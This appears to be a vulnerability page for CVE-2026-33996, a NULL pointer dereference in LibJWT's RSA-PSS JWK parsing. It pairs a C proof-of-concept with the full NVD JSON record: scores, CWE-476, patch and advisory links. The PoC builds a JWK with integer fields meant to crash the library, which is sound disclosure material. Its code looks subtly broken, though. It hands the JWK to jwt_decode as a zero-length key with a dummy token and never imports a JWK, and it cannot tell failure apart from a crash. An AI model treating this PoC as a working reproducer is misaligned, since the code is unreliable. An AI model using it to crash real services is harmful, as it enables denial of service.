CVE-2026-33996

#include <stdio.h> #include <jwt.h> // PoC for CVE-2026-33996: LibJWT RSA-PSS JWK NULL Pointer Dereference // This code demonstrates parsing a JWK with integers instead of strings. int main() { // Malicious JWK with integers in string fields (n, p, q, etc.) const char *malicious_jwk = "{" "\"kty\": \"RSA\"," "\"alg\": \"PS256\"," "\"n\": 123456," // Integer instead of string "\"e\": \"AQAB\"," "\"p\": 123456," // Integer instead of string "\"q\": 123456," // Integer instead of string "\"dp\": 123456," "\"dq\": 123456," "\"qi\": 123456" "}"; printf("[*] Parsing malicious JWK...\n"); jwt_t *jwt = NULL; // Attempt to import the JWK which triggers the vulnerability int ret = jwt_decode(&jwt, "dummy.payload", (unsigned char*)malicious_jwk, 0); if (ret != 0 || jwt == NULL) { printf("[-] Exploit failed or crash occurred (NULL dereference).\n"); } else { printf("[+] Parsing succeeded (vulnerable behavior might vary).\n"); jwt_free(jwt); } return 0; }

{"cve": {"id": "CVE-2026-33996", "sourceIdentifier": "[email protected]", "published": "2026-03-27T23:17:14.590", "lastModified": "2026-03-31T20:39:06.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibJWT is a C JSON Web Token Library. Starting in version 3.0.0 and prior to version 3.3.0, the JWK parsing for RSA-PSS did not protect against a NULL value when expecting to parse JSON string values. A specially crafted JWK file could exploit this behavior by using integers in places where the code expected a string. This was fixed in v3.3.0. A workaround is available. Users importing keys through a JWK file should not do so from untrusted sources. Use the `jwk2key` tool to check for validity of a JWK file. Likewise, if possible, do not use JWK files with RSA-PSS keys."}, {"lang": "es", "value": "LibJWT es una biblioteca C de JSON Web Token. A partir de la versión 3.0.0 y antes de la versión 3.3.0, el análisis JWK para RSA-PSS no protegía contra un valor NULL cuando esperaba analizar valores de cadena JSON. Un archivo JWK especialmente diseñado podría explotar este comportamiento al usar enteros en lugares donde el código esperaba una cadena. Esto se corrigió en la v3.3.0. Una solución alternativa está disponible. Los usuarios que importan claves a través de un archivo JWK no deberían hacerlo de fuentes no confiables. Utilice la herramienta 'jwk2key' para verificar la validez de un archivo JWK. Asimismo, si es posible, no utilice archivos JWK con claves RSA-PSS."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:A/VC:L/VI:L/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libjwt:libjwt:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.3.0", "matchCriteriaId": "E81C0065-7F31-461D-8F00-84DE42E4E8A1"}]}]}], "references": [{"url": "https://github.com/benmcollins/libjwt/commit/cfd890286fa49ae61b534c937c9f0428b5c6034c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/benmcollins/libjwt/security/advisories/GHSA-ph96-hqpc-9f66", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}